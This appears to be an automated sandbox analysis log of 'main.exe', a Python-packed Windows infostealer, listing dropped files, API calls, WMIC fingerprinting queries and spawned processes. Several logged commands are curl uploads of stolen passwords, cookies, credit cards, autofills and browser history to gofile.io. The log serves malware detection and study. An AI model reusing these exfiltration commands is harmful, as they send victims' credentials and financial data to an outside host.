            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_cpuid_c.pyd
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\_ssl.pyd
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32trace.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\libssl-3.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pythoncom311.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\python311.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3-x64.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA512.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed448.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com\shell\shell.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exe File created: C:\Users\user\AppData\Local\Temp\_MEI75802\MarkupSafe-3.0.2.dist-info\LICENSE.txt
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF733394C40 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF733394C40
            Source: C:\Users\user\Desktop\main.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\_cffi.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA1.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\win32ui.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Protocol\_scrypt.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_keccak.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA256.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_clmul.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD5.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_cffi_backend.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\ossl-modules\legacy.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_poly1305.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_webp.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\zstandard\backend_c.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2b.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_RIPEMD160.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve448.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\select.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\mfc140u.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_portable.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\_win32sysloader.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ec_ws.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD2.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\psutil\_psutil_windows.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Math\_modexp.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_brotli.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_elementtree.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\markupsafe\_speedups.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pywintypes311.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32trace.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pythoncom311.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\python311.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\libcrypto-3-x64.dllJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA512.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed448.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com\shell\shell.pydJump to dropped file
            Source: C:\Users\user\Desktop\main.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-19327
            Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00007FF733398840 FindFirstFileExW,FindClose,0_2_00007FF733398840
            Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00007FF733397800 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF733397800
            Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00007FF7333B2AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7333B2AE4
            Source: main.exe, 00000002.00000003.1977044312.000001E8935F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975698701.000001E8935C5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787609743.000001E8935EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1786073333.000001E8935EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793564892.000001E89359C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1789469075.000001E8935EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976909466.000001E8935C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1783710038.000001E893604000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001043628.000001E8935FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: curl.exe, 00000010.00000002.1850359269.000001A228639000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\main.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00007FF73339C6FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73339C6FC
            Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00007FF7333B46F0 GetProcessHeap,0_2_00007FF7333B46F0
            Source: C:\Users\user\Desktop\main.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\main.exe Process token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00007FF73339C8A0 SetUnhandledExceptionFilter,0_2_00007FF73339C8A0
            Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00007FF73339BE60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF73339BE60
            Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00007FF73339C6FC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF73339C6FC
            Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00007FF7333AB558 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7333AB558
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"Jump to behavior
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
            Source: C:\Users\user\Desktop\main.exe Process created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKey
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
